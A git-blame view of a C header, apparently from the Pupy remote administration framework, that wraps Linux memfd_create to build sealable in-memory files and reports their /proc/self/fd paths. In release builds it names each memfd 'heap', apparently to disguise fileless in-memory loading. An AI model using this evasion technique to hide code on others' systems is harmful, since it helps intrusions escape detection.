2017-03-02 08:02:18 +00:00
|
|
|
#ifndef _PUPY_MEMFD_H
|
|
|
|
#define _PUPY_MEMFD_H
|
|
|
|
|
|
|
|
#define _GNU_SOURCE
|
|
|
|
#include <sys/syscall.h>
|
2017-03-06 16:36:29 +00:00
|
|
|
#include <string.h>
|
2017-03-07 21:22:25 +00:00
|
|
|
#include <stdbool.h>
|
2017-03-02 08:02:18 +00:00
|
|
|
|
2017-03-06 05:43:24 +00:00
|
|
|
#define MFD_CLOEXEC 0x0001U
|
|
|
|
#define MFD_ALLOW_SEALING 0x0002U
|
2017-03-02 08:02:18 +00:00
|
|
|
|
|
|
|
#ifndef __NR_memfd_create
|
|
|
|
#ifdef __x86_64__
|
|
|
|
#define __NR_memfd_create 319
|
|
|
|
#elif __i386__
|
|
|
|
#define __NR_memfd_create 356
|
|
|
|
#endif
|
|
|
|
#endif
|
|
|
|
|
2017-03-06 05:43:24 +00:00
|
|
|
#ifndef F_ADD_SEALS
|
|
|
|
#define F_ADD_SEALS (1024 + 9)
|
|
|
|
#define F_SEAL_SEAL 0x0001
|
|
|
|
#define F_SEAL_SHRINK 0x0002
|
|
|
|
#define F_SEAL_GROW 0x0004
|
|
|
|
#define F_SEAL_WRITE 0x0008
|
|
|
|
#endif
|
|
|
|
|
|
|
|
#define MEMFD_FILE_PATH "/proc/self/fd/"
|
|
|
|
|
2017-03-02 08:02:18 +00:00
|
|
|
inline static int pupy_memfd_create(char *path, unsigned int path_size)
|
|
|
|
{
|
2017-04-05 05:49:51 +00:00
|
|
|
#ifndef DEBUG
|
2017-04-05 07:58:06 +00:00
|
|
|
memset(path, 0x0, path_size);
|
|
|
|
strncpy(path, "heap", path_size);
|
2017-04-05 05:49:51 +00:00
|
|
|
#endif
|
|
|
|
|
2017-04-05 07:58:06 +00:00
|
|
|
int fd = syscall(__NR_memfd_create, path, MFD_CLOEXEC | MFD_ALLOW_SEALING);
|
2017-04-03 20:35:33 +00:00
|
|
|
|
2017-03-16 21:01:13 +00:00
|
|
|
if (fd == -1) {
|
|
|
|
return -1;
|
|
|
|
}
|
2017-03-02 08:02:18 +00:00
|
|
|
|
2017-03-16 21:01:13 +00:00
|
|
|
snprintf(path, path_size, MEMFD_FILE_PATH "%d", fd);
|
|
|
|
return fd;
|
2017-03-02 08:02:18 +00:00
|
|
|
}
|
|
|
|
|
2017-03-06 05:43:24 +00:00
|
|
|
inline static bool is_memfd_path(const char *path)
|
|
|
|
{
|
2017-03-16 21:01:13 +00:00
|
|
|
return !strncmp(path, MEMFD_FILE_PATH, strlen(MEMFD_FILE_PATH));
|
2017-03-06 05:43:24 +00:00
|
|
|
}
|
|
|
|
|
2017-03-02 08:02:18 +00:00
|
|
|
#endif
|